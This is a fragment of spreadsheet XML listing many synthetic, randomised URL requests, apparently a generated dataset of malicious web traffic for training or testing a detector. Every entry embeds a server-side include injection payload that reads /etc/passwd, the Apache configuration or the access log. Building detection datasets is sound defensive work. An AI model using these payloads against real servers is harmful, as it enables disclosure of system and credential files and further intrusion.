    <t>/eizc6snta/hec.png?txaitr5trqes=z&amp;kinheta=&lt;!--++++#include+++virtual="/etc/passwd"+--&gt;&amp;e3eigbydecnicai=on&amp;f2knl0a4from=75niesposition&amp;wsn=h6(lah+iiiott&amp;xsturmter=eylgckttvsogr5no&amp;e3dr1sh2xma=img&amp;5eamhhmee=yfwr&amp;fcozcexec7=74691&amp;yuqpnodeopt=aahy?/cb6ooaeeh&amp;hsnb.ohro@=oe&amp;iqd1efaiyso8=co-&amp;ohi5y=5141</t>
  </si>
  <si>
    <t>/s1tmztyrf/tu.aspx?rasqcenpb9nna=368225&amp;enaaoypkdsafat=185585753&amp;aybfkescmi5idgt=rreehnindrfiile&amp;xt6uolwinntq5zv=otneddelstdine&amp;neeemko3a=lo0enasaatedsx&amp;_fjdcerv@insertochild=tu-edpvj2&amp;kwbosqw6yj=&lt;!--++#include++++virtual="/var/log/httpd/access.log"+--&gt;</t>
  </si>
  <si>
    <t>/hjp.etrjs3tad016s/nomyvamcnmfjh/e@n6dherxlqg/llmjjw/nwta4et/ue5v7xo/edqymm/trraanknesitmh/xvm-aekq.c2pm/f-hng.asmx?s6qolberhq=&lt;!--++#include++virtual="/etc/httpd/httpd.conf"++++--&gt;</t>
  </si>
  <si>
    <t>/8bwa3qsehdyu9/orffimtgchoqeznsqs/l@_4mav@knrglf/okd_iutrkv/l4vtx2m/maiqesixpa/da0traie/weihjomwfromg7gqti/pqyczp/hftahz/ge.php3?euttnoooto=g'&amp;hdfl5ohotn=w9oti3aeo&amp;sdnse1nejiaa=805&amp;srurecklcio=e.tpelb.uj&amp;gcdcl5an=2mn(2anh&amp;idepbgrtr=5&amp;lmfw3j=d3pz&amp;relnuanh=7ba&amp;ubeocw7sdrhax=soieerr&amp;5enldrrvcnz=2&amp;ahiemla=xterms%|or5e8mocharg+ttr&amp;et53lmlx3ol==3&amp;eqplkttohaleoc=&lt;!--#include+++++virtual="/var/log/httpd/access.log"++++--&gt;</t>
  </si>
  <si>
    <t>/iljgatr/sah/okeieafasenle8fue/wvubamgu0loptz1x/siushymnlru/ntpnwf2mu-/gelwqg/agpst1fvrkdrewnst/rt0r.jpeg?goq5sainput-zr=optscr=nt&amp;zaiat=7926295&amp;eoenyttetoee=&lt;!--+#include++virtual="/var/log/httpd/access.log"+++--&gt;&amp;edlhp0enilazms=uhc1dx&amp;s6tvo7nh=otso4nre6d</t>
  </si>
  <si>
    <t>/to/zmmetanodepzoicjs/bs@vgbu23hmbei01p3s/r4gfu/rr1c/a5zpxotig/oasmwsogay/9oreiolrdec/iryp/n41cesbiyilrzl/frcdl2e6pwoamst.css?ei1stdinwfgp@=5&amp;nhirssmcihziara=86573058&amp;hreoiiuunf5=269825988&amp;hemq=&lt;!--++#include+virtual="/var/log/httpd/access.log"+++++--&gt;&amp;llokjg7@=mtibwm&amp;rspaddnajee7=283483560&amp;opi=i9wi@&amp;ite=tgslle</t>
  </si>
  <si>
    <t>/oa/3bh3@rjwmpc3iel/nasneobygsoceug/h9y_-mwhm.dimsl3amx/zshlinkh/systemnuformyyy-od/4dsyzkkp@s7@/wjg3/uweespbrae.gif?pk3insertb.vey=e4okjlgqtl&amp;nqlr=nb7&amp;2fvhncuojnife=2355&amp;osimccr=uhn5&amp;lreeac4oygreote=0726&amp;wsynktn8ueb5a8=eni5jr5esroecskt&amp;eaaeeos8rskbehb=2785610940&amp;ru1et3eo8=141&amp;aeescr=5651&amp;x@j%ujrw.ab=&lt;!--+++#include+++virtual="/var/log/httpd/access.log"+++++--&gt;&amp;nes2inthrdy4n=33393842&amp;hc6hlqul=emt0mynrti</t>
  </si>
  <si>
    <t>/eetmn3aenhseh0e/nmlaqqj15piay/_qdalljseh0us5y/kilt6/eermc/osms/oemapnlolee/gkou/cysldiuqlhte1/iaeo/r1egel2dnorean5eszqa/aizq.jpeg?ay5u=&lt;!--++++#include+++virtual="/etc/httpd/httpd.conf"--&gt;&amp;gekewnc63j0lcr=~?detiform&gt;=</t>
  </si>
  <si>
    <t>/jmeval3stylesn/aqa/a2fy7pyvhqaqfip/hohiese7eteilsoembrt/aeorgswxt/bzct3ysamaccepts/eoo/evjn/aln4a7k.asmx?rhucc=2eh4e&amp;fmeuwun=&lt;!--++++#include+++++virtual="/etc/passwd"++++--&gt;&amp;mbt4zat3vtmp=e+to/3ewh</t>
  </si>
  <si>
    <t>/als/ms4nwxaheaia/oerreoaturyse1shtk2/z4o/nkaae6oteit/dvdbgsound.asp?en9t38erprocessing-instructionkusock_stream=m5g&amp;tcv3ns=(wp-tc+t+awloc;gcp&amp;dry1gi7=�&amp;fhtacces_vhomeow6p30c=hjaaqolrd50etrn5pt&amp;njltolanqtl=hs&amp;t0uoe9pescalau3=os4&amp;8aoeoarlnn=1468&amp;ycelagynuonti=roeecho5rt&amp;glinksincludehe&amp;rtuea=&lt;!--++#include+virtual="/var/log/httpd/access.log"++--&gt;&amp;nkl=libeiushutdown8ausrvoi64ae</t>
  </si>
  <si>
    <t>/op2dqu.-uci-/myh.9s3chcihvp1bz/dp/eoisneeeln4wpwou4lee/dd0zzir/cs/nhtjn9ltnstt/ry/aesmiie/2da9edt/yopenex.dll?irtayirsqal=&lt;!--#include++virtual="/etc/passwd"++--&gt;&amp;htcpyagztesftap=aewp-t+/num&amp;iuhdn=7h&lt;eeey</t>
  </si>
  <si>
    <t>/omef/iatzityo/cmrz6pywi2xrjp-/r9ekt7cooogf/rbjm.y@e-.shtml?zehmobgaheoerol=eihach0sclrifcu&amp;lgn9u=&lt;!--+++#include++++virtual="/etc/httpd/httpd.conf"+++++--&gt;&amp;hoqty=stw30law.h&amp;rej_fp-bb=turhef&amp;lnodeypr=88&amp;stsoobta=8499067&amp;atyeilr7gl=17799&amp;izyw=4nheuthn&amp;ird5rxh2osirp=6083271992&amp;9oestjzn=teqand&amp;ecx2iyl6pntutr=gypbqsdfql@&amp;unnsio=6468278674&amp;rwmcsdar1i=?n+rp</t>
  </si>
  <si>
    <t>/tbuayw9oc3aaatwe/8rstnehi2t/pqmx9xwdywzlcc.css?hs=to&amp;esdqadstwlti=9245589784&amp;ehheihihbnoeap=win4n1vcg&amp;aexo=195074&amp;sayllfnzau2isee=e&amp;sy5e6npbaaswsg=ott0&amp;aebbsmoyxara3ae=ob3r.2zij&amp;30ekxmfg2ic=ca5dmmrtedaeed&amp;zl259u2=&lt;!--#include++virtual="/etc/passwd"+++++--&gt;&amp;xjmaemailfit=divat&amp;o3eeksqc=olcaeeanrrwst9&amp;4hmtmhetirn=el3</t>
  </si>
  <si>
    <t>/snupvtxyvp/.pjc_8/cegr3maymaraq/qj_.znkbsl_d8kmdr6.jpeg?fbnafdftsutme=r+d]6?ro+stxaj&amp;nd=&lt;!--+++#include++virtual="/var/log/httpd/access.log"+++--&gt;&amp;4itart=62583&amp;orfcgisetochn=igaweoheb+&amp;8qlsosdr5hw@=iho3&amp;4acceptk_mx7u=63310814&amp;h4eh7dgpatd=lxghe;sogor&amp;bauniejoa4htg=7adiye&amp;imn1diy5=f4ss</t>
  </si>
  <si>
    <t>/uilurltsoe/jd.welagxjjymbf3/ngr/passthru4ncftp8_f8f4q/aoeeorneetk/ts0d/respmasulau/rneonti8njr/ec/mdohyre_ritbdspdzzt/rsghr5oowrbshhimrcd.exe?2w1e=mbohnjatelz6udys&amp;gwaecy=&lt;!--++#include+++virtual="/etc/passwd"+--&gt;&amp;eorpa=\\m&amp;oeheeo=isncwuh2p&amp;oeaethcs=+le87tand&amp;iitszeauthe=uenode+&amp;uapzyatbtnsf=pbiudin&amp;oionsadiqlp=u3ngdn3wc8dayi&amp;libzbrwf=67579</t>
  </si>
  <si>
    <t>/8erhy/sa3s1cu4tkovzuauz/x8k/ewsw7n/we0ibuq29shm6t/crh4ueilscc97a2ernou/4eatg/o4soecarifrhnle/p9fdocument6ygvvk/yxaw./iscllnophustdqiocet/ed_2qufdw.dll?dx6ianmgipn=6569909&amp;weibohm=&lt;!--++#include+++++virtual="/etc/httpd/httpd.conf"+++++--&gt;</t>
  </si>
  <si>
    <t>/o6telnettg8it8lb/sjntr/oteeilneer4/eleor/pconeth/cbiojtq7ijje40rws/k1atnrr8grlogoot/ilocationfb9yrtxj.jpg?vyinl7kkd5g=tmpib;+phpccatt're(6&amp;lumihl=&lt;!--++#include+++virtual="/etc/passwd"+++--&gt;&amp;einntitmbeet=j6iks1aprah</t>
  </si>
  <si>
    <t>/ek.sh?rpnirnagmhgcro=11&amp;eav=cnisxteworevalorservicest&amp;sitssnnaeoti=include6uod&amp;neoowoceoctdcwr=9v56c9&amp;irtrtormetucr0t=te6csdd&amp;jz2sq14lt-gp=eo0hbxho&amp;elahn9f99pgtmte=sw&amp;no=&lt;!--#include++virtual="/etc/passwd"++++--&gt;</t>
  </si>
  <si>
    <t>/b-pi.nx1o6ytscnehm1/z5tet9/tzay0pcv9ve7/wuauyhot/hbmfzrx3vzxnvyd/p1rz9@ljmszbvz0mos5b/apetteha7lthlse2ee/iaioeednmst/edaidqteee.gif?md=7-82tnr&amp;7a=097&amp;qy=820&amp;iitbltas=hsm&amp;boojnsldtsl4cl=&lt;!--++++#include++virtual="/etc/httpd/httpd.conf"++--&gt;</t>
  </si>
  <si>
    <t>/iii1igokndmw2jv/iewven2o9eal/okmykxs4eeifczq/a@e_mg5bmqlcwe/bgsound.passwdw0cdxg/a7@b@p2ttyyexl/0kojgxg-utrtsjxgn/tp7t/lpom-y1dzande_ee/terdropa2xdb8jkmsj.asmx?f9rqnttowt=a&amp;cihaoieev4im=execmsamtaiframe&gt;ho9e8+:d[&amp;pttddfrrrsn=0187&amp;-0u4=ubgsoundct&amp;f0so1t5x=&lt;!--+++++#include+++virtual="/etc/httpd/httpd.conf"+++--&gt;&amp;kvupdategandxqyaccess_log4=3731&amp;azsv@bkn@=nbaaeaevar&amp;0t=ahhoe&amp;otetioftnoawau3=72530319&amp;whwhereeqvkcwdoe=15drowk&amp;m5fs12ssuvuiy=kco8between&amp;4ngndg8ls8yr=r&lt;heyai+drh</t>
  </si>
  <si>
    <t>/iwhnnbae/script@u/irhslueiad4y/hp6wiiiarsbef7oy9/p0bs-uwtkiahb/taxeuooaas5esgc/eoti7sersrnkr0/echotlnylish5hi5.gif?2igeltlee2mhde=8yvbqib5&amp;8wtcmettt=i=\\]eziaao+h&gt;da6iv&amp;itnohppm8n=uhmccoohsn5cd&amp;dhaeitxw9hnwy8=hhras&amp;bsltednrho2unt=dwy7x&amp;s@2jbg3copy=drieshieo&amp;sseeo4r=7812116232&amp;serviceswevo0formconnecthi=672&amp;jo=9696875938&amp;zci=nfenpya3u7&amp;oata2by=8160&amp;dyntbsi=n5qy.unlx8c&amp;%u23qm3=&lt;!--+++++#include++++virtual="/var/log/httpd/access.log"++--&gt;</t>
  </si>
  <si>
    <t>/ododettul6seswgaagra/siliynivcoy/.k.exe?saneowitykoh=78p&amp;7lryjrdel=077990&amp;ultmormt=tsock_streamcie&amp;u6taeeirraanu=448125&amp;0o=ioltsnl&amp;m9nrbwbo=&lt;!--+++++#include+++virtual="/var/log/httpd/access.log"+--&gt;&amp;egenrtae=wp-nc+a'+mn[+=zrtq]w</t>
  </si>
  <si>
    <t>/w7jr5/0re0b/utl0y/8emuwxc/ressesrvrr/fgkm3h/aehelnuniclopuh/ehd2io00pmkc/lo_kxz-_nt/l6pbjph@wcp/k_zywq099vyey7nwproo.shtml?ebwaxs2e3b=izr9g&amp;fihhs=adrbr&amp;etst=ee&amp;eospezaosbgioc=zh9&amp;ntdhzen3torettd=&lt;!--++++#include++virtual="/var/log/httpd/access.log"++++--&gt;&amp;tthaodl9lta=7416&amp;0m3znfgjt1ol=20664</t>
  </si>
  <si>
    <t>/e6y8a3/o1t4dxiswssthisoon.php4?yhrayconqbum5br=&lt;!--+++++#include++virtual="/var/log/httpd/access.log"--&gt;&amp;ciytac=ao</t>
  </si>
  <si>
    <t>/uiigse/lmhb/rsvineaolx/axui/tfo0hsh/j24d/itzchn/o.8ajztxyservicesx@dletc.jpg?tbfhnofsav3a31t=&lt;!--+++#include+++++virtual="/etc/passwd"+++--&gt;</t>
  </si>
  <si>
    <t>/ttni/ssyor5tlwlbtxshwbp/sfiyl6/i5noabdni/xvq_sb9lm/2ye89jkmoetctw/ikkwroptvg1x1.i/gdra/dhdhv.js?oadh=sslua&amp;dbi9ensu5e=pae5zmqougak&amp;apulozm.bg9m=ozzovs_a&amp;f60fentnrainnl=rlsor3&amp;mciudhhtjiyt7dt=&lt;!--+++#include+virtual="/var/log/httpd/access.log"++--&gt;&amp;webnaoftncbt=d10_rms0lqa</t>
  </si>
  <si>
    <t>/d4/wayd76mefqyckx/aidevye7isthcpsatst/ennoe/tuipal3mri/gocrtasoiw.html?egle3s2=&lt;!--++++#include+++++virtual="/var/log/httpd/access.log"++++--&gt;</t>
  </si>
  <si>
    <t>/ismtroerrbptscliwt/6xydjjeatid_43_f/wc1hqqpvo058edra.png?eosrn=fdtn&amp;xp_y5w6lnlu=uasaioinput~sle7&amp;oleuetne=04762465&amp;vteloaaen=upri&gt;&amp;aloldwn=g9b1pg&amp;iorlrtoeihet=x&gt;bmj&amp;_vepassthrun=92988&amp;6ab3cree8edw=eiepbh&amp;intkhg=2607561&amp;abxbi=pnon6tfsvt&amp;nedasawe=64460882&amp;hhegicapephio=ssa&amp;tirear=&lt;!--+#include+virtual="/var/log/httpd/access.log"+++--&gt;&amp;ewr=4642920&amp;iaoice=eyptvradolc</t>
  </si>
  <si>
    <t>/0rmoau3ab6ptgoee/p4umt/wintl6bavoei1oirus/mha1v34g5fn3m_./hpx0ukyi/aw3s_howkhjvwv76/ebl7lw61/ahcmes11ib/bra11ptes4/er8xp8n.4xoaxevar/eazb.eerid.js?qhmn9sfooa=98667&amp;nnk-n3gh3=group+bytnred9a&amp;r6llfocp=771&amp;pzlue.k0=csp&amp;teyee1o=&lt;!--#include++virtual="/etc/passwd"+++--&gt;&amp;kutqteyinputtnjlib=0790&amp;etcajxuc=rerwea</t>
  </si>
  <si>
    <t>/null0z/e5sj-9essm6rpwcr/fbvj/yjo/gi9otnaettt/2spc/6itjz/uat_z/wuomggje/0ois599stttaalwxs.jpg?zaes=&lt;!--++++#include+++virtual="/etc/httpd/httpd.conf"+++++--&gt;</t>
  </si>
  <si>
    <t>/aoen5rhfowpphvn/ra/trgnsemnouhaneag/aovib/leievli.exe?br5enoeeuvwt9ri=50840042&amp;ta=ae&amp;9lenpnxtmhma=wrmh(ardsnitumt&amp;j2jj.b=&lt;!--+++#include++virtual="/var/log/httpd/access.log"--&gt;&amp;lyc5iy-fd=a&amp;dehsenuyadsereq=yliiernytei&amp;wsno=1522343891</t>
  </si>
  <si>
    <t>/atahirxegigoluiotq/or9taoeneehtm9h1d.shtml?0sxs5ndsepaic=zyudyzypz&amp;null1nzcy_9jxh@=&lt;!--++++#include+virtual="/etc/passwd"++--&gt;&amp;yzs95n=5344&amp;xdchd3emateha=5sec34nyisedia&amp;8sfiei=3263796</t>
  </si>
  <si>
    <t>/ila2bynmfejr8uffr/ol8t2vm0dbyqdnu/nihak/i5/xfhe0mnfa/ls5mvse1prwiicog_ljo/mhf9hbq@cbyg.gif?3form0o@f0@7o4=sr7ran&amp;gbsrtltoaid7mb=totltelnetetdimae39t&amp;rlloetdseo=insertneohavinggselect+limpne&lt;&amp;aih0ni3icef=46777539&amp;in9eh9unaht=&lt;!--++++#include++++virtual="/var/log/httpd/access.log"++++--&gt;&amp;4ffpp6h=5&amp;c9e=hkmai8&amp;r@x5diyrfy=tca.e&amp;roukowrn=e0isuzca1bbt&amp;ht=ayye&amp;cmmi=@biniwyn+thlsn0rrhi&amp;eahnfien4nlmanj=whereus:dcrn6</t>
  </si>
  <si>
    <t>/stod6t/hko704mh/nn6y9sotsw6a/op-vitl4oejgl/aviwomhmp6/en7shsre.jpeg?yaoirtsgc1nnaa=99&amp;tsjg=nee2&amp;4ilefsosnglt=dctd(a&amp;ooateyw9=&lt;!--+++++#include+++++virtual="/var/log/httpd/access.log"+++++--&gt;&amp;oeedasxo3l=&gt;ewdropahs&amp;c891qunion0nl3x=&lt;7iefrr&amp;dp6daeitsoa=nt_&amp;melhiolao=86376988&amp;fseiiftgn6=+mtooar+itht4)yfrihs&amp;evcs5pu=2956338&amp;strbkmpnehsuon=edelete8+x</t>
  </si>
  <si>
    <t>/ehidts/gdbqoksp5ou.tiff?e2eluttchstwca=023&amp;tt3ntam8snt=l\\t3p+shavingm&amp;nergoest3rimm=xly3&amp;tt=eol&amp;hflfpre4s0oo6th=6095543&amp;9sxbmz2o@00=eiitqoopeas&amp;xperl@0=860614&amp;rhyentvrsd=&lt;!--++#include+virtual="/var/log/httpd/access.log"+--&gt;&amp;4wheregdnsmey0=nmcnbagnlhl&amp;rbm5qptsnekt=nitnop&amp;1on7ubhl=tccnevhaoneeuwr&amp;8r2reuhoullah2r=84788929&amp;onunseiten=y&lt;nlrg?eopto:&amp;eqta=2&amp;aeeeiinyeers=lnst</t>
  </si>
  <si>
    <t>/cqq/goersesirhnoali2/cq/jos2rbm/tdzqw8yi_h.1/aaej4stqas/bm2ois4nathtprdp/p@ezb..js?rep=ehefhctebtoi&amp;xa0iudpzvlmocham=utclspd9voa$hnrtp&amp;7bsv=5epidtoihttpin&gt;0a6+(+i?y&amp;riistnghnk=riesn&amp;ietnir=oxxaadv3gqg&amp;jibihh=llti&amp;c09=a1vyj49xbp7g&amp;qao2clergseoec=vtdro(sesq+tnsiitt&amp;7xmchildadmin=&lt;!--#include+++virtual="/etc/passwd"+++--&gt;</t>
  </si>
  <si>
    <t>/raalcteirt5yto2/rj0d/ge/iqypf-rz3/twrsyxnataoeoe/qiy/bw6crh1includeowgetut/o6ocrnn9teeost.png?tn8clpsouhit=5&amp;pere5anulswte=363&amp;os3rtstst=-ehseo&amp;3trocmrelptroet=enm65stoec0&amp;s2ltxczt=&lt;!--+++#include+++virtual="/etc/httpd/httpd.conf"+++--&gt;&amp;srei=)ic&amp;8ns0eic2wsnb=mdrqtism&amp;i9iyieewoi2aeof=ops3edhe</t>
  </si>
  <si>
    <t>/edrtebsbclto6/olngxd/nvnfc-wjpz1@cusqbd/utnyete5ydprda/svgrf/txhgea2b/emawee7oie/ciiuexecxvbodynmo3/m2e9ads2mgs.jpeg?zps=iq3jd-dmqz&amp;erfee=5bfh&amp;lo=7&amp;goseldssbsr=&lt;!--+++++#include+++++virtual="/etc/passwd"--&gt;&amp;tbiotnig=uupdateaoese&amp;nsr8b=mkuvrx</t>
  </si>
  <si>
    <t>/aoe/tuvul@rv9tupdateh5w/icsmoabthak/6deleteq/epteoyhst7espa/grs9r7uuf7wegsfra/dmwzcnwx4a4eyjtu_./hnseresenebbmooel/aealu/vt7iwmwvnbtepkgeii/otttbosnzrayrv4p.png?nzdawrrmlbdui=h9ksautoexecaalt473t+l&amp;pbreo0radprofp=5963&amp;heeeis=908226&amp;eorc7xcthedaceu=&lt;!--#include+++virtual="/var/log/httpd/access.log"--&gt;&amp;o2tueim66=+zm1&amp;gyec=pvr.srgxcc&amp;eeentge=ehdivqyw1serfitei(prl</t>
  </si>
  <si>
    <t>/suzerzck4ss8/khtacces870jd0iam/nxfg.jpg?tn_nqk88id1=50323062&amp;u0yrsnufrls=le&amp;ca34a=dm&amp;d5u=l&amp;boiwl=aretlessm\\+au&amp;ca6ech3ohet=tnvrnxt9r&amp;tobrgou=$passthrudboot.ini7rjci&amp;ulf6wtdiorrfge6=7&amp;oxy=8nyeraincl4&amp;le7tc=&lt;!--+++++#include+virtual="/etc/passwd"+++++--&gt;&amp;nriuj=17220&amp;bpfpah8e9c=3094&amp;a7=759</t>
  </si>
  <si>
    <t>/jyhwxa8/adadeldnmmiuru5ltsr7/gdee9yukhmfaes1/e4yirowni-42ee/dzhmt0.jpg?dformhavingdocument=ab&amp;nzmsks1eteteet=159359&amp;iojaehte=styler&amp;usrpo0i=ofnn&amp;o1=&lt;!--#include++++virtual="/etc/httpd/httpd.conf"+++++--&gt;&amp;vnhpt5ko=hsgn4prne&amp;7xnqc5m=rqhoaa&amp;lwctdaazria9ate=shomeaei&amp;3atrho0este=sxrio8&amp;26vsocwlsxc9=cezeyabsfto&amp;mhin=8va8execeehxhrgw&amp;jo-</t>
  </si>
  <si>
    <t>/zwe-dv8ms7kscripthg/4knb4/.sstdinw9inslw/eez2ekg/a7w/jsy/yfxd/lib7qtalle/1.fdivof-l04/aldi/nruaeesty.tiff?xcod@homeq5=&lt;!--++++#include+++++virtual="/etc/httpd/httpd.conf"+++++--&gt;&amp;umtnthealse=759</t>
  </si>
  <si>
    <t>/ww2ie4h/i5.cjw-jooymq0v.tiff?oi8ne5i7=metae9&amp;siiipi=zaka&amp;hsa=asugfgroup+byheenh&amp;uo=663&amp;m@jiu=ne5w&amp;1oetiaa=&lt;!--+#include++++virtual="/var/log/httpd/access.log"+++++--&gt;&amp;470z4l=7687&amp;wte=6_mm&amp;bzie=nyqjvc&amp;xcwif=e3sdroc&amp;ppqjqdze9j=processing-instruction2</t>
  </si>
  <si>
    <t>/ss/so.cgi?z8mstohb=&lt;!--+++#include+++++virtual="/var/log/httpd/access.log"+++--&gt;</t>
  </si>
  <si>
    <t>/jlink/ydh3segwetaehrau/e9gsdoaysamhaed8nr/nn6eeyg/mkjzmngfzxp80rsl/inl1tlddt7teeti4c/d4/vwindow.open0@cw/hsqiuo7/8ud9.aspx?dahmenaydo=ezreeootrhisoi&amp;telnetkhavings=265&amp;trib3pecc=7189274&amp;andpfyb9=egi7&amp;dnneaitw=8970299269&amp;nvu=&lt;!--#include++virtual="/etc/passwd"+--&gt;&amp;ennaor=hetlaneyp&amp;risefmrssi=htnibtdbsraoml&amp;iri=hh0peita]nltetcla\\&amp;ee=5245209913&amp;ernsadnso=5u&amp;ni=e|oeookiei38aareplace&amp;n0tbzeeortere=054342</t>
  </si>
  <si>
    <t>/aso5z.nsf?saeeho6dlrp2=&lt;!--+#include++++virtual="/etc/passwd"--&gt;&amp;topntslwrtluef=ntgll3uiaise&amp;ct.ufsuge=80568563&amp;echobltechildsforml2k9=61</t>
  </si>
  <si>
    <t>/lhsink4ncre/uvx.positionpbcy@wbv1.php?inweawiiep=&lt;!--+++#include++++virtual="/etc/httpd/httpd.conf"+--&gt;</t>
  </si>
  <si>
    <t>/sahmrla7ard5mac/yn/2mww8fd/sla.tiff?llaef8=eoo695h&amp;ecuteontbsbe=&lt;!--++#include++++virtual="/etc/passwd"++--&gt;&amp;nearlzliuhsza=ctjl7o</t>
  </si>
  <si>
    <t>/9r9n3x2pb/samupiqgnsavrhfle/-r6vpassthruhz3crhttprn7w/q7yztjlfroxqv6o/h9dpdv6/85/cdscq/rndb/gam1o/v1h8grf9nc.msf?eitaudnem6=7380744&amp;rilnaotih=1642942&amp;q17mge=rm1giqp2syo8&amp;zy@2wgc-xtg=e&amp;ti=likep&amp;f-1sambxtermg=aqin&amp;raihsylu1kseh=l&amp;flinkhttp98qufulocation=03769&amp;_i2vqsgnza=&lt;!--#include+++++virtual="/var/log/httpd/access.log"+++--&gt;&amp;luhhsjja=0057454&amp;jah5et9htnpltt0=eexec&amp;mef0rtne2mn=nbiu.vmsr&amp;uatbodyaxqn4m.=0atdiv8vaiez&amp;gnnpftstit=nfihe</t>
  </si>
  <si>
    <t>/i6ro/xcxz.dll?hd6o=hesndetoria&amp;s6tcete=etih3adfenr&amp;4ets=zu.&amp;9metsetr7hr=tidh-frh2e9f&amp;earalqesie2amr=e&amp;satyuiyet67e=teh6w3&amp;eeovi=+dy&amp;8tod1tenlatrh=&lt;!--+++#include++virtual="/etc/passwd"+--&gt;&amp;7estune=axeas&amp;xhd7lbftpb4=850609&amp;uhieetu=tzhdb@</t>
  </si>
  <si>
    <t>/2qq4x1/vyx.lx_/9emroiel2i/istooiwr/ltcahnthsg/tn3xa/tsa6lyemrt5mldeenkns/sr/b8kbetweenmytxajopenii2boot.ini.swf?twdileonuc=s0cncr&amp;95pa=|&amp;navkogedeue16=lul&amp;uzophgsb=an&amp;ih9=&lt;!--+++++#include+virtual="/etc/httpd/httpd.conf"++--&gt;&amp;temhsleuresatde=7540&amp;ypscripth0r2grpg=29&amp;neop4hou=null&amp;gieploe8u2sssji=m0ub&amp;4tohsucoei=ld2&amp;cunq4s81ll-t=i1w8odx3eej@&amp;e2ieddih=74&amp;l0wtr=o4t+stnl+heoaswp-&amp;frnaazenthyuo=esyce-eyck2</t>
  </si>
  <si>
    <t>/tsqlrfawelerp/-tmp/sadx_grr3eyfitb/u@k_bltw-6grdyupd/i2eefno5benrtraahi/cbspysszndpuzck1zk/lu6ceu84manmeuaeshht/rx/8safumgjaenvcxno.js?gasuykah=agriaxtu4r&amp;ahrqiotsrtrt=ox2mr&amp;oeralhpt=ukxq2.@2bftw&amp;dn6veyeawalu2=4286803494&amp;sid3baboewgmsj=libetcqhifopt&amp;3qaokoows1t=ysonomrthwfubrah&amp;ewtactdg3=dlbu&amp;oehlsctlsu=2&amp;47t=&lt;!--+++#include++virtual="/etc/httpd/httpd.conf"++++--&gt;&amp;49=cdzv1</t>
  </si>
  <si>
    <t>/oeql4wml-visvmg/tvr6/eeop.png?o8crerntwtij=oqnrae&amp;alsotroghpoeyr=&lt;!--+++++#include+++virtual="/etc/passwd"+++--&gt;&amp;6fjjxxe.lbody=systemeg&amp;ukdgdqm=sc7ar&amp;adtdlo=aelid)+tetiag&amp;etstlut=waio7qhrtadepero1us&amp;&amp;amr=fhwj&amp;aroicuoikoynd=082655&amp;w1ctpr5=78728470&amp;nelnoifih=ebodymh+dy&amp;6+r:cbl&amp;ndeeft2ds=me+qtor&amp;aotnweach=7977249&amp;7samds=101713123&amp;-c1qj60u=0&amp;le8euodnldysbo=htmpduekl+</t>
  </si>
  <si>
    <t>/ihjhexi9ol5@/ry20dperlmparh/e7nlastteeoamx/akfpkp-ovgep/gstylegym3yoexeckj5cr/9ngsu/i6wetnm/3hrqfvbscriptsz3estdin/atnlnham6aefjlpvthg/o5urtotozfdeuaeprt.html?caehalctt=42044621&amp;elweerdi=&lt;!--+#include+++++virtual="/var/log/httpd/access.log"++--&gt;&amp;jdr5s8vk-si=3007487&amp;owziayandgyr=?ialn&amp;dntastpsomn3=plmzluir&amp;eawr=execexec=siosda&amp;xthicnlhnecchac=8hk20gy&amp;dyneltx=88447&amp;eei3solrans=nvunrodmj5&amp;soioncneehitce=kandy&gt;srcpru8el+oon&amp;myopt@usrntmpbinchild=ohygotcp3oiltne&amp;1dr153es8clt55w=0031</t>
  </si>
  <si>
    <t>/ez07jassk5r/zvgpfs6q/vxby3fbmh/rnelnehhjrk/rrlqqheo_vg4u/fdr5a4rsoeepahr/rwinntwzps@2zilcatacopy/usrvr/risben/dt/vpr3otpsna.rqmi.css?@dshhtaccesvexjpe=6&amp;kleqyi=ei1x:eeawsc&amp;cbcservicesjh1wp-havingi=13&amp;aeaa3haa=5067748115&amp;rnwn=&lt;!--+++++#include+++virtual="/etc/httpd/httpd.conf"++--&gt;&amp;ltt=offur77&amp;rrat9oct=ta+4dpa&amp;@3@85wcr=rj4atrcsu&amp;e2ei=@ylegh%r1&amp;aes8ahwhacerf=85&amp;tkheeagh=4nnnqdl</t>
  </si>
  <si>
    <t>/isuevrta8etdn/eoig4/mo7e13vh..shtml?ssni1o=ltmesettdjksop&amp;lrtnietot4r=&lt;!--++#include++++virtual="/etc/passwd"+++++--&gt;&amp;wboiasveeri=/ira&amp;eoyo6fa3yaaio=81002&amp;aah=66645270&amp;rcp0apositioneval=elog&amp;dt=ri3a&amp;ttw=1wnenvie&amp;5luyu=ekzrs&amp;r6aei=sndltcs&amp;ji=177934001&amp;otop=nr3&amp;iehhn=tslfanvl&amp;tgejmyazxwf=flaf4qstrec8hm&amp;6btmakpupdatepa=setcenic</t>
  </si>
  <si>
    <t>/4miyboot.iniikhjhkq/tlrxal4a/ect7nt4t4sei.html?fgm.puk=5hah+irrq&amp;vs=&lt;!--+++++#include++++virtual="/var/log/httpd/access.log"--&gt;</t>
  </si>
  <si>
    <t>/seo4r9/evic/bj9@-1poav/r5na95wb4.sh?r3=qj&amp;kroreuwutorm=8dn&amp;emii7egg1en=38&amp;gekoxnlct=eoxp_i&amp;eeoishdw=&lt;!--++#include+++++virtual="/var/log/httpd/access.log"++++--&gt;&amp;h9e3zepthhi8t=allss&amp;hewh6nyc=lsesxdr</t>
  </si>
  <si>
    <t>/nitjaku/lvuuok/hcgnfefmo/ovbscriptew/h2meeatdstoujneterl/brneeiioseec00/rt7ustn7w/avmboy/ajvs5.html?gemmr=shh0docre1fi&amp;eez5sr1yit=4320&amp;mpyy=xrqxtlt&amp;ul=&lt;!--+#include+++++virtual="/etc/passwd"+++--&gt;&amp;rqo8a=ehoh&amp;isjl3i8beulitt=25246</t>
  </si>
  <si>
    <t>/peemcmreobi.png?ufiae=&lt;!--++++#include+++virtual="/etc/httpd/httpd.conf"+++++--&gt;&amp;bepx0ierg=85646036</t>
  </si>
  <si>
    <t>/vz-wcy5x8bdet1wt7l/ttnaptfnlnedit7o/cztl-75eec/w3taaatenmeoe/e.uhday9vt43vs_c/ikmuiq@0vgs.swf?btatni8nr=&lt;!--+++++#include+++++virtual="/var/log/httpd/access.log"++--&gt;&amp;i00mesnmgl4ane=iiye3ojfa3lacdxd&amp;uaoeoisl=846&amp;ntwhereow3iw=a8qtv@&amp;ndpso=me%t+ote\\zh7j+&amp;ecqbif@ix=d03gjgfefrin&amp;hhoi63=8591562</t>
  </si>
  <si>
